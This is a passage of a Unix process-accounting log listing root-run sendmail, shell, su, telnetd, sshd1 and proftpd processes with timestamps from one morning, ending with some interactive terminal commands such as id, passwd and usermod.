06:22 8973 sendmail SF root __ 0.01 secs Sat Jun 3 06:22 8957 sendmail SF root __ 0.05 secs Sat Jun 3 06:22 8956 sendmail SF root __ 0.03 secs Sat Jun 3 06:22 8954 sendmail SF root __ 0.05 secs Sat Jun 3 06:22 8953 sendmail SF root __ 0.03 secs Sat Jun 3 06:22 8951 sendmail SF root __ 0.05 secs Sat Jun 3 06:22 8950 sendmail SF root __ 0.02 secs Sat Jun 3 06:22 8944 sendmail SF root __ 0.05 secs Sat Jun 3 06:24 8942 sendmail SF root __ 0.06 secs Sat Jun 3 06:24 8940 sendmail SF root __ 0.06 secs Sat Jun 3 06:24 8938 sendmail SF root __ 0.08 secs Sat Jun 3 06:24 8937 sendmail SF root __ 0.03 secs Sat Jun 3 06:24 8925 sendmail SF root __ 0.02 secs Sat Jun 3 06:24 8898 sendmail SF root __ 0.05 secs Sat Jun 3 06:25 8896 sendmail SF root __ 0.05 secs Sat Jun 3 06:26 8895 sendmail SF root __ 0.03 secs Sat Jun 3 06:25 8875 sendmail SF root __ 0.05 secs Sat Jun 3 06:27 8872 sendmail SF root __ 0.03 secs Sat Jun 3 06:26 8871 sendmail SF root __ 0.06 secs Sat Jun 3 06:27 8859 cat S root __ 0.01 secs Sat Jun 3 06:27 8858 sendmail SF root __ 0.01 secs Sat Jun 3 06:27 8857 sendmail S root __ 0.22 secs Sat Jun 3 06:27 8856 sh S root __ 0.01 secs Sat Jun 3 06:27 8855 sendmail SF root __ 0.01 secs Sat Jun 3 06:27 8822 sendmail SF root __ 0.05 secs Sat Jun 3 06:26 8816 sendmail SF root __ 0.02 secs Sat Jun 3 06:28 8815 sendmail SF root __ 0.03 secs Sat Jun 3 06:28 8813 sendmail SF root __ 0.05 secs Sat Jun 3 06:29 8811 sendmail SF root __ 0.05 secs Sat Jun 3 06:29 8810 sendmail SF root __ 0.03 secs Sat Jun 3 06:28 8717 sendmail SF root __ 0.06 secs Sat Jun 3 06:31 8716 sendmail SF root __ 0.05 secs Sat Jun 3 06:31 8714 sendmail SF root __ 0.08 secs Sat Jun 3 06:31 8672 cat S root __ 0.01 secs Sat Jun 3 06:32 8671 sendmail SF root __ 0.01 secs Sat Jun 3 06:32 8670 sendmail S root __ 0.20 secs Sat Jun 3 06:32 8669 sh S root __ 0.01 secs Sat Jun 3 06:32 8668 sendmail SF root __ 0.02 secs Sat Jun 3 06:32 8653 sendmail SF root __ 0.05 secs Sat Jun 3 06:33 8652 sendmail SF root __ 0.03 secs Sat Jun 3 06:32 8650 sendmail SF root __ 0.06 secs Sat Jun 3 06:33 8597 sendmail SF root __ 0.02 secs Sat Jun 3 06:36 8571 cat S root __ 0.01 secs Sat Jun 3 06:37 8570 sendmail SF root __ 0.01 secs Sat Jun 3 06:37 8569 sendmail S root __ 0.22 secs Sat Jun 3 06:37 8568 sh S root __ 0.01 secs Sat Jun 3 06:37 8567 sendmail SF root __ 0.01 secs Sat Jun 3 06:37 8557 sendmail SF root __ 0.05 secs Sat Jun 3 06:37 8520 sendmail SF root __ 0.03 secs Sat Jun 3 06:36 8509 sendmail SF root __ 0.09 secs Sat Jun 3 06:37 8501 sendmail SF root __ 0.05 secs Sat Jun 3 06:39 8500 sendmail SF root __ 0.03 secs Sat Jun 3 06:38 8497 sendmail SF root __ 0.08 secs Sat Jun 3 06:39 8495 sendmail SF root __ 0.08 secs Sat Jun 3 06:39 8494 sendmail SF root __ 0.03 secs Sat Jun 3 06:39 8488 sendmail SF root __ 0.05 secs Sat Jun 3 06:39 8486 sendmail SF root __ 0.06 secs Sat Jun 3 06:39 8470 sendmail SF root __ 0.03 secs Sat Jun 3 06:39 8450 sendmail SF root __ 0.06 secs Sat Jun 3 06:39 8411 cat S root __ 0.01 secs Sat Jun 3 06:42 8410 sendmail SF root __ 0.01 secs Sat Jun 3 06:42 8409 sendmail S root __ 0.22 secs Sat Jun 3 06:42 8408 sh S root __ 0.01 secs Sat Jun 3 06:42 8407 sendmail SF root __ 0.01 secs Sat Jun 3 06:42 8406 sendmail SF root __ 0.09 secs Sat Jun 3 06:41 8342 sendmail SF root __ 0.05 secs Sat Jun 3 06:46 8341 sendmail SF root __ 0.03 secs Sat Jun 3 06:46 8339 sendmail SF root __ 0.05 secs Sat Jun 3 06:46 8310 cat S root __ 0.01 secs Sat Jun 3 06:47 8309 sendmail SF root __ 0.01 secs Sat Jun 3 06:47 8308 sendmail S root __ 0.20 secs Sat Jun 3 06:47 8307 sh S root __ 0.01 secs Sat Jun 3 06:47 8306 sendmail SF root __ 0.02 secs Sat Jun 3 06:47 8266 sendmail SF root __ 0.05 secs Sat Jun 3 06:48 8265 sendmail SF root __ 0.03 secs Sat Jun 3 06:48 8263 sendmail SF root __ 0.06 secs Sat Jun 3 06:48 8143 cat S root __ 0.01 secs Sat Jun 3 06:52 8142 sendmail SF root __ 0.01 secs Sat Jun 3 06:52 8141 sendmail S root __ 0.22 secs Sat Jun 3 06:52 8140 sh S root __ 0.01 secs Sat Jun 3 06:52 8139 sendmail SF root __ 0.01 secs Sat Jun 3 06:52 8102 sendmail SF root __ 0.05 secs Sat Jun 3 06:53 8100 sendmail SF root __ 0.05 secs Sat Jun 3 06:53 8099 sendmail SF root __ 0.02 secs Sat Jun 3 06:52 8088 sendmail SF root __ 0.05 secs Sat Jun 3 06:53 8087 sendmail SF root __ 0.05 secs Sat Jun 3 06:54 8086 sendmail SF root __ 0.03 secs Sat Jun 3 06:53 8084 sendmail SF root __ 0.05 secs Sat Jun 3 06:54 8083 sendmail SF root __ 0.02 secs Sat Jun 3 06:53 8081 sendmail SF root __ 0.05 secs Sat Jun 3 06:54 8080 sendmail SF root __ 0.05 secs Sat Jun 3 06:54 8078 sendmail SF root __ 0.06 secs Sat Jun 3 06:54 8077 sendmail SF root __ 0.02 secs Sat Jun 3 06:54 8065 sendmail SF root __ 0.03 secs Sat Jun 3 06:53 8043 sendmail SF root __ 0.05 secs Sat Jun 3 06:56 8041 sendmail SF root __ 0.05 secs Sat Jun 3 06:56 8040 sendmail SF root __ 0.02 secs Sat Jun 3 06:56 8036 sendmail SF root __ 0.05 secs Sat Jun 3 06:56 8035 sendmail SF root __ 0.05 secs Sat Jun 3 06:56 8034 sendmail SF root __ 0.03 secs Sat Jun 3 06:56 8033 sendmail SF root __ 0.02 secs Sat Jun 3 06:56 8030 sendmail SF root __ 0.06 secs Sat Jun 3 06:56 8029 sendmail SF root __ 0.05 secs Sat Jun 3 06:56 8011 cat S root __ 0.01 secs Sat Jun 3 06:57 8010 sendmail SF root __ 0.01 secs Sat Jun 3 06:57 8009 sendmail S root __ 0.22 secs Sat Jun 3 06:57 8008 sh S root __ 0.01 secs Sat Jun 3 06:57 8007 sendmail SF root __ 0.02 secs Sat Jun 3 06:57 8006 sendmail SF root __ 0.09 secs Sat Jun 3 06:57 8003 sendmail SF root __ 0.06 secs Sat Jun 3 06:57 7989 sendmail SF root __ 0.03 secs Sat Jun 3 06:57 7988 sendmail SF root __ 0.03 secs Sat Jun 3 06:57 7986 sendmail SF root __ 0.05 secs Sat Jun 3 06:57 7975 sendmail SF root __ 0.02 secs Sat Jun 3 06:56 7971 sendmail SF root __ 0.06 secs Sat Jun 3 06:56 7943 sendmail SF root __ 0.05 secs Sat Jun 3 06:59 7941 sendmail SF root __ 0.05 secs Sat Jun 3 06:59 7940 sendmail SF root __ 0.05 secs Sat Jun 3 06:59 7939 sendmail SF root __ 0.02 secs Sat Jun 3 06:59 7937 sendmail SF root __ 0.06 secs Sat Jun 3 06:59 7936 sendmail SF root __ 0.02 secs Sat Jun 3 06:59 7886 sshd1 SF root __ 0.31 secs Sat Jun 3 07:00 7874 sendmail SF root __ 0.05 secs Sat Jun 3 07:01 7873 sendmail SF root __ 0.03 secs Sat Jun 3 07:01 7871 sendmail SF root __ 0.06 secs Sat Jun 3 07:01 7849 cat S root __ 0.01 secs Sat Jun 3 07:02 7843 sendmail SF root __ 0.01 secs Sat Jun 3 07:02 7842 sendmail S root __ 0.20 secs Sat Jun 3 07:02 7841 sh S root __ 0.01 secs Sat Jun 3 07:02 7840 sendmail SF root __ 0.02 secs Sat Jun 3 07:02 7839 sendmail SF root __ 0.05 secs Sat Jun 3 07:02 7837 sendmail SF root __ 0.06 secs Sat Jun 3 07:02 7831 sendmail SF root __ 0.02 secs Sat Jun 3 07:02 7830 sendmail SF root __ 0.05 secs Sat Jun 3 07:03 7829 sendmail SF root __ 0.03 secs Sat Jun 3 07:03 7827 sendmail SF root __ 0.05 secs Sat Jun 3 07:04 7773 sendmail SF root __ 0.03 secs Sat Jun 3 07:06 7771 sendmail SF root __ 0.05 secs Sat Jun 3 07:06 7763 sendmail SF root __ 0.05 secs Sat Jun 3 07:06 7751 cat S root __ 0.01 secs Sat Jun 3 07:07 7750 sendmail SF root __ 0.01 secs Sat Jun 3 07:07 7749 sendmail S root __ 0.20 secs Sat Jun 3 07:07 7748 sh S root __ 0.01 secs Sat Jun 3 07:07 7747 sendmail SF root __ 0.01 secs Sat Jun 3 07:07 7722 sendmail SF root __ 0.02 secs Sat Jun 3 07:08 7649 sendmail SF root __ 0.05 secs Sat Jun 3 07:11 7647 sendmail SF root __ 0.06 secs Sat Jun 3 07:11 7646 sendmail SF root __ 0.03 secs Sat Jun 3 07:11 7630 cat S root __ 0.01 secs Sat Jun 3 07:12 7629 sendmail SF root __ 0.01 secs Sat Jun 3 07:12 7628 sendmail S root __ 0.20 secs Sat Jun 3 07:12 7627 sh S root __ 0.01 secs Sat Jun 3 07:12 7626 sendmail SF root __ 0.02 secs Sat Jun 3 07:12 7615 sendmail SF root __ 0.05 secs Sat Jun 3 07:11 7565 sendmail SF root __ 0.06 secs Sat Jun 3 07:15 7563 sendmail SF root __ 0.03 secs Sat Jun 3 07:15 7562 sendmail SF root __ 0.06 secs Sat Jun 3 07:15 7526 cat S root __ 0.01 secs Sat Jun 3 07:17 7525 sendmail SF root __ 0.01 secs Sat Jun 3 07:17 7524 sendmail S root __ 0.20 secs Sat Jun 3 07:17 7523 sh S root __ 0.01 secs Sat Jun 3 07:17 7522 sendmail SF root __ 0.02 secs Sat Jun 3 07:17 7511 sendmail SF root __ 0.05 secs Sat Jun 3 07:17 7509 sendmail SF root __ 0.06 secs Sat Jun 3 07:17 7508 sendmail SF root __ 0.03 secs Sat Jun 3 07:16 7401 sendmail SF root __ 0.05 secs Sat Jun 3 07:21 7399 sendmail SF root __ 0.05 secs Sat Jun 3 07:21 7398 sendmail SF root __ 0.03 secs Sat Jun 3 07:21 7386 cat S root __ 0.01 secs Sat Jun 3 07:22 7385 sendmail SF root __ 0.01 secs Sat Jun 3 07:22 7384 sendmail S root __ 0.20 secs Sat Jun 3 07:22 7383 sh S root __ 0.01 secs Sat Jun 3 07:22 7382 sendmail SF root __ 0.02 secs Sat Jun 3 07:22 7366 sendmail SF root __ 0.05 secs Sat Jun 3 07:23 7365 sendmail SF root __ 0.05 secs Sat Jun 3 07:23 7362 sendmail SF root __ 0.06 secs Sat Jun 3 07:23 7361 sendmail SF root __ 0.06 secs Sat Jun 3 07:23 7360 sendmail SF root __ 0.03 secs Sat Jun 3 07:23 7359 sendmail SF root __ 0.02 secs Sat Jun 3 07:23 7282 sendmail SF root __ 0.05 secs Sat Jun 3 07:26 7280 sendmail SF root __ 0.05 secs Sat Jun 3 07:26 7279 sendmail SF root __ 0.03 secs Sat Jun 3 07:26 7258 cat S root __ 0.01 secs Sat Jun 3 07:27 7257 sendmail SF root __ 0.01 secs Sat Jun 3 07:27 7256 sendmail S root __ 0.20 secs Sat Jun 3 07:27 7255 sh S root __ 0.01 secs Sat Jun 3 07:27 7254 sendmail SF root __ 0.01 secs Sat Jun 3 07:27 7244 sendmail SF root __ 0.05 secs Sat Jun 3 07:27 7243 sendmail SF root __ 0.02 secs Sat Jun 3 07:27 7241 sendmail SF root __ 0.06 secs Sat Jun 3 07:28 7234 sendmail SF root __ 0.09 secs Sat Jun 3 07:26 7226 sendmail SF root __ 0.06 secs Sat Jun 3 07:28 7225 sendmail SF root __ 0.03 secs Sat Jun 3 07:28 7223 sendmail SF root __ 0.08 secs Sat Jun 3 07:28 7176 sendmail SF root __ 0.05 secs Sat Jun 3 07:30 7174 sendmail SF root __ 0.03 secs Sat Jun 3 07:30 7173 sendmail SF root __ 0.06 secs Sat Jun 3 07:30 7142 cat S root __ 0.01 secs Sat Jun 3 07:32 7141 sendmail SF root __ 0.01 secs Sat Jun 3 07:32 7140 sendmail S root __ 0.20 secs Sat Jun 3 07:32 7139 sh S root __ 0.01 secs Sat Jun 3 07:32 7138 sendmail SF root __ 0.02 secs Sat Jun 3 07:32 7100 sendmail SF root __ 0.05 secs Sat Jun 3 07:33 7099 sendmail SF root __ 0.03 secs Sat Jun 3 07:32 7095 sendmail SF root __ 0.06 secs Sat Jun 3 07:33 7093 su S root ttyp0 0.06 secs Sat Jun 3 07:33 7085 su S root ttyp0 0.06 secs Sat Jun 3 07:34 7084 su S root ttyp0 0.06 secs Sat Jun 3 07:34 7056 su S root ttyp1 0.06 secs Sat Jun 3 07:35 7031 su S root ttyp1 0.06 secs Sat Jun 3 07:35 7030 su S root ttyp1 0.06 secs Sat Jun 3 07:35 6977 cat S root __ 0.01 secs Sat Jun 3 07:37 6976 sendmail SF root __ 0.01 secs Sat Jun 3 07:37 6975 sendmail S root __ 0.25 secs Sat Jun 3 07:37 6974 sh S root __ 0.01 secs Sat Jun 3 07:37 6973 sendmail SF root __ 0.02 secs Sat Jun 3 07:37 6943 sshd1 SF root __ 0.31 secs Sat Jun 3 07:37 6811 su S root ttyp1 0.06 secs Sat Jun 3 07:41 6782 cat S root __ 0.01 secs Sat Jun 3 07:42 6781 sendmail SF root __ 0.01 secs Sat Jun 3 07:42 6780 sendmail S root __ 0.22 secs Sat Jun 3 07:42 6779 sh S root __ 0.01 secs Sat Jun 3 07:42 6778 sendmail SF root __ 0.01 secs Sat Jun 3 07:42 6754 sendmail SF root __ 0.02 secs Sat Jun 3 07:41 6748 sendmail SF root __ 0.05 secs Sat Jun 3 07:43 6746 sendmail SF root __ 0.05 secs Sat Jun 3 07:43 6740 sendmail SF root __ 0.03 secs Sat Jun 3 07:43 6732 sendmail SF root __ 0.06 secs Sat Jun 3 07:44 6730 sendmail SF root __ 0.05 secs Sat Jun 3 07:44 6729 sendmail SF root __ 0.02 secs Sat Jun 3 07:44 6625 cat S root __ 0.01 secs Sat Jun 3 07:47 6624 sendmail SF root __ 0.01 secs Sat Jun 3 07:47 6623 sendmail S root __ 0.23 secs Sat Jun 3 07:47 6622 sh S root __ 0.01 secs Sat Jun 3 07:47 6621 sendmail SF root __ 0.02 secs Sat Jun 3 07:47 6603 sendmail SF root __ 0.05 secs Sat Jun 3 07:48 6601 sendmail SF root __ 0.05 secs Sat Jun 3 07:48 6600 sendmail SF root __ 0.02 secs Sat Jun 3 07:48 6599 sendmail SF root __ 0.06 secs Sat Jun 3 07:48 6597 sendmail SF root __ 0.06 secs Sat Jun 3 07:48 6596 sendmail SF root __ 0.03 secs Sat Jun 3 07:48 6594 sendmail SF root __ 0.05 secs Sat Jun 3 07:49 6593 sendmail SF root __ 0.03 secs Sat Jun 3 07:49 6591 sendmail SF root __ 0.05 secs Sat Jun 3 07:49 6544 sendmail SF root __ 0.09 secs Sat Jun 3 07:50 6543 sendmail SF root __ 0.03 secs Sat Jun 3 07:50 6493 sendmail SF root __ 0.05 secs Sat Jun 3 07:52 6492 sendmail SF root __ 0.03 secs Sat Jun 3 07:52 6487 sendmail SF root __ 0.06 secs Sat Jun 3 07:52 6482 cat S root __ 0.01 secs Sat Jun 3 07:52 6481 sendmail SF root __ 0.01 secs Sat Jun 3 07:52 6480 sendmail S root __ 0.20 secs Sat Jun 3 07:52 6479 sh S root __ 0.01 secs Sat Jun 3 07:52 6477 sendmail SF root __ 0.02 secs Sat Jun 3 07:52 6476 sendmail SF root __ 0.05 secs Sat Jun 3 07:52 6474 sendmail SF root __ 0.06 secs Sat Jun 3 07:52 6473 sendmail SF root __ 0.02 secs Sat Jun 3 07:52 6472 sendmail SF root __ 0.05 secs Sat Jun 3 07:52 6470 sendmail SF root __ 0.03 secs Sat Jun 3 07:52 6469 sendmail SF root __ 0.06 secs Sat Jun 3 07:52 6468 sendmail SF root __ 0.05 secs Sat Jun 3 07:52 6466 sendmail SF root __ 0.03 secs Sat Jun 3 07:52 6465 sendmail SF root __ 0.05 secs Sat Jun 3 07:52 6454 sendmail SF root __ 0.05 secs Sat Jun 3 07:53 6453 sendmail SF root __ 0.05 secs Sat Jun 3 07:53 6452 sendmail SF root __ 0.03 secs Sat Jun 3 07:53 6450 sendmail SF root __ 0.02 secs Sat Jun 3 07:53 6449 sendmail SF root __ 0.05 secs Sat Jun 3 07:53 6447 sendmail SF root __ 0.06 secs Sat Jun 3 07:53 6446 sendmail SF root __ 0.05 secs Sat Jun 3 07:54 6444 sendmail SF root __ 0.05 secs Sat Jun 3 07:54 6443 sendmail SF root __ 0.05 secs Sat Jun 3 07:54 6442 sendmail SF root __ 0.05 secs Sat Jun 3 07:54 6440 sendmail SF root __ 0.03 secs Sat Jun 3 07:54 6439 sendmail SF root __ 0.06 secs Sat Jun 3 07:54 6381 telnetd S root __ 0.12 secs Sat Jun 3 07:54 6366 sendmail SF root __ 0.05 secs Sat Jun 3 07:56 6364 sendmail SF root __ 0.05 secs Sat Jun 3 07:56 6363 sendmail SF root __ 0.03 secs Sat Jun 3 07:56 6358 sendmail SF root __ 0.05 secs Sat Jun 3 07:56 6356 sendmail SF root __ 0.06 secs Sat Jun 3 07:56 6355 sendmail SF root __ 0.03 secs Sat Jun 3 07:56 6352 telnetd S root __ 0.09 secs Sat Jun 3 07:56 6351 sendmail SF root __ 0.03 secs Sat Jun 3 07:56 6350 sendmail SF root __ 0.03 secs Sat Jun 3 07:56 6342 sendmail SF root __ 0.06 secs Sat Jun 3 07:56 6341 sendmail SF root __ 0.03 secs Sat Jun 3 07:56 6339 sendmail SF root __ 0.08 secs Sat Jun 3 07:57 6338 sendmail SF root __ 0.06 secs Sat Jun 3 07:56 6335 sendmail SF root __ 0.05 secs Sat Jun 3 07:57 6334 sendmail SF root __ 0.03 secs Sat Jun 3 07:57 6332 sendmail SF root __ 0.06 secs Sat Jun 3 07:57 6320 cat S root __ 0.01 secs Sat Jun 3 07:57 6319 sendmail SF root __ 0.01 secs Sat Jun 3 07:57 6318 sendmail S root __ 0.20 secs Sat Jun 3 07:57 6317 sh S root __ 0.01 secs Sat Jun 3 07:57 6316 sendmail SF root __ 0.02 secs Sat Jun 3 07:57 6301 sendmail SF root __ 0.05 secs Sat Jun 3 07:57 6300 sendmail SF root __ 0.03 secs Sat Jun 3 07:57 6298 sendmail SF root __ 0.05 secs Sat Jun 3 07:57 6289 sendmail SF root __ 0.02 secs Sat Jun 3 07:56 6267 sendmail SF root __ 0.05 secs Sat Jun 3 07:59 6264 sendmail SF root __ 0.06 secs Sat Jun 3 07:59 6263 sendmail SF root __ 0.03 secs Sat Jun 3 07:59 6262 sendmail SF root __ 0.06 secs Sat Jun 3 07:59 6260 sendmail SF root __ 0.08 secs Sat Jun 3 07:59 6259 sendmail SF root __ 0.03 secs Sat Jun 3 07:59 6223 sendmail SF root __ 0.06 secs Sat Jun 3 08:00 6222 sendmail SF root __ 0.05 secs Sat Jun 3 08:00 6217 sendmail SF root __ 0.12 secs Sat Jun 3 08:00 6210 sendmail SF root __ 0.05 secs Sat Jun 3 08:00 6209 sendmail SF root __ 0.06 secs Sat Jun 3 08:00 6208 sendmail SF root __ 0.03 secs Sat Jun 3 08:00 6207 sendmail SF root __ 0.03 secs Sat Jun 3 08:00 6205 sendmail SF root __ 0.06 secs Sat Jun 3 08:00 6203 sendmail SF root __ 0.05 secs Sat Jun 3 08:00 6155 sendmail SF root __ 0.06 secs Sat Jun 3 08:01 6154 sendmail SF root __ 0.05 secs Sat Jun 3 08:01 6152 sendmail SF root __ 0.11 secs Sat Jun 3 08:01 6133 cat S root __ 0.01 secs Sat Jun 3 08:02 6132 sendmail SF root __ 0.01 secs Sat Jun 3 08:02 6131 sendmail S root __ 0.22 secs Sat Jun 3 08:02 6130 sh S root __ 0.01 secs Sat Jun 3 08:02 6129 sendmail SF root __ 0.02 secs Sat Jun 3 08:02 6106 sendmail SF root __ 0.06 secs Sat Jun 3 08:03 6105 sendmail SF root __ 0.05 secs Sat Jun 3 08:02 6103 sendmail SF root __ 0.08 secs Sat Jun 3 08:03 6099 telnetd S root __ 0.09 secs Sat Jun 3 08:01 6014 sendmail SF root __ 0.05 secs Sat Jun 3 08:06 6011 sendmail SF root __ 0.06 secs Sat Jun 3 08:06 6010 sendmail SF root __ 0.03 secs Sat Jun 3 08:05 5966 cat S root __ 0.01 secs Sat Jun 3 08:07 5965 sendmail SF root __ 0.01 secs Sat Jun 3 08:07 5964 sendmail S root __ 0.20 secs Sat Jun 3 08:07 5963 sh S root __ 0.01 secs Sat Jun 3 08:07 5962 sendmail SF root __ 0.02 secs Sat Jun 3 08:07 5949 sendmail SF root __ 0.05 secs Sat Jun 3 08:07 5941 sendmail SF root __ 0.05 secs Sat Jun 3 08:06 5939 sendmail SF root __ 0.08 secs Sat Jun 3 08:07 5912 sendmail SF root __ 0.22 secs Sat Jun 3 08:09 5911 sendmail SF root __ 0.05 secs Sat Jun 3 08:09 5885 sendmail SF root __ 0.64 secs Sat Jun 3 08:09 5872 telnetd S root __ 0.11 secs Sat Jun 3 08:09 5866 telnetd S root __ 0.09 secs Sat Jun 3 08:10 5862 sendmail SF root __ 0.06 secs Sat Jun 3 08:10 5858 sendmail SF root __ 0.08 secs Sat Jun 3 08:10 5857 sendmail SF root __ 0.03 secs Sat Jun 3 08:10 5815 cat S root __ 0.01 secs Sat Jun 3 08:12 5814 sendmail SF root __ 0.01 secs Sat Jun 3 08:12 5813 sendmail S root __ 0.23 secs Sat Jun 3 08:12 5812 sh S root __ 0.01 secs Sat Jun 3 08:12 5811 sendmail SF root __ 0.01 secs Sat Jun 3 08:12 5802 sendmail SF root __ 0.03 secs Sat Jun 3 08:11 5801 sendmail SF root __ 0.08 secs Sat Jun 3 08:13 5800 sendmail SF root __ 0.05 secs Sat Jun 3 08:13 5798 sendmail SF root __ 0.06 secs Sat Jun 3 08:13 5785 sendmail SF root __ 0.05 secs Sat Jun 3 08:14 5784 sendmail SF root __ 0.05 secs Sat Jun 3 08:14 5783 sendmail SF root __ 0.05 secs Sat Jun 3 08:14 5782 sendmail SF root __ 0.03 secs Sat Jun 3 08:14 5780 sendmail SF root __ 0.08 secs Sat Jun 3 08:14 5778 sendmail SF root __ 0.08 secs Sat Jun 3 08:14 5776 sendmail SF root __ 0.05 secs Sat Jun 3 08:14 5775 sendmail SF root __ 0.03 secs Sat Jun 3 08:14 5773 sendmail SF root __ 0.08 secs Sat Jun 3 08:14 5664 cat S root __ 0.01 secs Sat Jun 3 08:17 5661 sendmail SF root __ 0.01 secs Sat Jun 3 08:17 5660 sendmail S root __ 0.22 secs Sat Jun 3 08:17 5659 sh S root __ 0.01 secs Sat Jun 3 08:17 5658 sendmail SF root __ 0.01 secs Sat Jun 3 08:17 5581 telnetd S root __ 0.31 secs Sat Jun 3 08:12 5554 sendmail SF root __ 0.05 secs Sat Jun 3 08:21 5552 sendmail SF root __ 0.08 secs Sat Jun 3 08:21 5532 sendmail SF root __ 0.05 secs Sat Jun 3 08:20 5528 telnetd S root __ 0.12 secs Sat Jun 3 08:19 5514 cat S root __ 0.01 secs Sat Jun 3 08:22 5513 sendmail SF root __ 0.01 secs Sat Jun 3 08:22 5512 sendmail S root __ 0.20 secs Sat Jun 3 08:22 5511 sh S root __ 0.01 secs Sat Jun 3 08:22 5510 sendmail SF root __ 0.01 secs Sat Jun 3 08:22 5508 sendmail SF root __ 0.05 secs Sat Jun 3 08:22 5507 sendmail SF root __ 0.05 secs Sat Jun 3 08:22 5505 sendmail SF root __ 0.03 secs Sat Jun 3 08:22 5503 sendmail SF root __ 0.08 secs Sat Jun 3 08:22 5502 sendmail SF root __ 0.06 secs Sat Jun 3 08:22 5501 sendmail SF root __ 0.03 secs Sat Jun 3 08:22 5491 sendmail SF root __ 0.05 secs Sat Jun 3 08:23 5489 sendmail SF root __ 0.08 secs Sat Jun 3 08:23 5483 sendmail SF root __ 0.03 secs Sat Jun 3 08:23 5476 sendmail SF root __ 0.05 secs Sat Jun 3 08:23 5474 sendmail SF root __ 0.06 secs Sat Jun 3 08:23 5473 sendmail SF root __ 0.02 secs Sat Jun 3 08:23 5463 sendmail SF root __ 0.06 secs Sat Jun 3 08:23 5461 sendmail SF root __ 0.08 secs Sat Jun 3 08:24 5460 sendmail SF root __ 0.03 secs Sat Jun 3 08:23 5419 telnetd S root __ 0.11 secs Sat Jun 3 08:24 5395 proftpd S root __ 78.81 secs Sat Jun 3 08:06 5369 cat S root __ 0.01 secs Sat Jun 3 08:27 5367 sendmail SF root __ 0.01 secs Sat Jun 3 08:27 5366 sendmail S root __ 0.22 secs Sat Jun 3 08:27 5365 sh S root __ 0.01 secs Sat Jun 3 08:27 5364 sendmail SF root __ 0.02 secs Sat Jun 3 08:27 5350 sendmail SF root __ 0.05 secs Sat Jun 3 08:27 5348 sendmail SF root __ 0.05 secs Sat Jun 3 08:27 5347 sendmail SF root __ 0.03 secs Sat Jun 3 08:27 5338 sendmail SF root __ 0.03 secs Sat Jun 3 08:26 5182 cat S root __ 0.01 secs Sat Jun 3 08:32 5181 sendmail SF root __ 0.01 secs Sat Jun 3 08:32 5180 sendmail S root __ 0.19 secs Sat Jun 3 08:32 5179 sh S root __ 0.01 secs Sat Jun 3 08:32 5178 sendmail SF root __ 0.02 secs Sat Jun 3 08:32 5036 cat S root __ 0.01 secs Sat Jun 3 08:37 5035 sendmail SF root __ 0.01 secs Sat Jun 3 08:37 5034 sendmail S root __ 0.20 secs Sat Jun 3 08:37 5033 sh S root __ 0.01 secs Sat Jun 3 08:37 5032 sendmail SF root __ 0.02 secs Sat Jun 3 08:37 5022 sendmail SF root __ 0.05 secs Sat Jun 3 08:37 5021 sendmail SF root __ 0.03 secs Sat Jun 3 08:36 5019 sendmail SF root __ 0.06 secs Sat Jun 3 08:37 5017 sshd1 SF root __ 0.47 secs Sat Jun 3 08:02 5007 su S root ttyp1 0.08 secs Sat Jun 3 08:38 4982 su S root ttyp3 0.06 secs Sat Jun 3 08:39 4927 sshd1 SF root __ 0.78 secs Sat Jun 3 08:39 4910 telnetd S root __ 0.08 secs Sat Jun 3 08:40 4880 clear S root ttyp3 0.02 secs Sat Jun 3 08:41 4879 ls S root ttyp3 0.01 secs Sat Jun 3 08:41 4875 id S root ttyp3 0.01 secs Sat Jun 3 08:42 4869 passwd S root ttyp3 0.11 secs Sat Jun 3 08:42 4868 sh S root ttyp3 0.02 secs Sat Jun 3 08:41 4867 sh S root ttyp3 0.01 secs Sat Jun 3 08:41 4866 .bru S root ttyp3 0.01 secs Sat Jun 3 08:41 4864 sshd1 SF root __ 0.34 secs Sat Jun 3 08:41 4856 cat S root __ 0.01 secs Sat Jun 3 08:42 4855 sendmail SF root __ 0.01 secs Sat Jun 3 08:42 4854 sendmail S root __ 0.22 secs Sat Jun 3 08:42 4853 sh S root __ 0.01 secs Sat Jun 3 08:42 4852 sendmail SF root __ 0.01 secs Sat Jun 3 08:42 4851 su S root ttyp1 0.06 secs Sat Jun 3 08:42 4850 id S root ttyp1 0.01 secs Sat Jun 3 08:42 4849 kotalkd S root __ 0.05 secs Sat Jun 3 08:36 4848 ktalkd S root __ 0.16 secs Sat Jun 3 08:36 4837 sendmail SF root __ 0.03 secs Sat Jun 3 08:41 4826 sendmail SF root __ 0.02 secs Sat Jun 3 08:43 4795 pico S root ttyp1 0.30 secs Sat Jun 3 08:43 4794 bash S root ttyp1 0.08 secs Sat Jun 3 08:43 4793 sh S root ttyp1 0.08 secs Sat Jun 3 08:42 4703 cat S root __ 0.01 secs Sat Jun 3 08:47 4702 sendmail SF root __ 0.01 secs Sat Jun 3 08:47 4701 sendmail S root __ 0.22 secs Sat Jun 3 08:47 4700 sh S root __ 0.01 secs Sat Jun 3 08:47 4699 sendmail SF root __ 0.02 secs Sat Jun 3 08:47 4691 proftpd S root __ 22.67 secs Sat Jun 3 08:36 4610 sendmail SF root __ 0.09 secs Sat Jun 3 08:50 4609 sendmail SF root __ 0.06 secs Sat Jun 3 08:50 4607 sendmail SF root __ 0.09 secs Sat Jun 3 08:50 4553 pico S root ttyp0 0.05 secs Sat Jun 3 08:51 4550 clear S root ttyp0 0.02 secs Sat Jun 3 08:52 4535 clear S root ttyp0 0.01 secs Sat Jun 3 08:52 4531 cat S root __ 0.01 secs Sat Jun 3 08:52 4530 sendmail SF root __ 0.01 secs Sat Jun 3 08:52 4529 sendmail S root __ 0.20 secs Sat Jun 3 08:52 4528 sh S root __ 0.01 secs Sat Jun 3 08:52 4527 sendmail SF root __ 0.02 secs Sat Jun 3 08:52 4526 id S root ttyp0 0.02 secs Sat Jun 3 08:52 4525 cat S root ttyp0 0.01 secs Sat Jun 3 08:52 4524 grep S root ttyp0 0.11 secs Sat Jun 3 08:52 4523 basename S root ttyp0 0.01 secs Sat Jun 3 08:52 4522 usermod S root ttyp0 0.27 secs Sat Jun 3 08:52 4521 uadmin.s S root ttyp0 0.02 secs Sat Jun 3 08:52 4518 clear S root ttyp0 0.01 secs Sat Jun 3 08:52 4517 id S root ttyp0 0.01 secs Sat Jun 3 08:52 4516 grep S root ttyp0 0.01 secs Sat Jun 3 08:52 4515 uadmin.s SF root ttyp0 0.01 secs Sat Jun 3 08:52 4514 cut S root ttyp0 0.01 secs Sat Jun 3 08:52 4513 clear S root ttyp0 0.01 secs Sat Jun 3 08:52 4512 uadmin.s S root 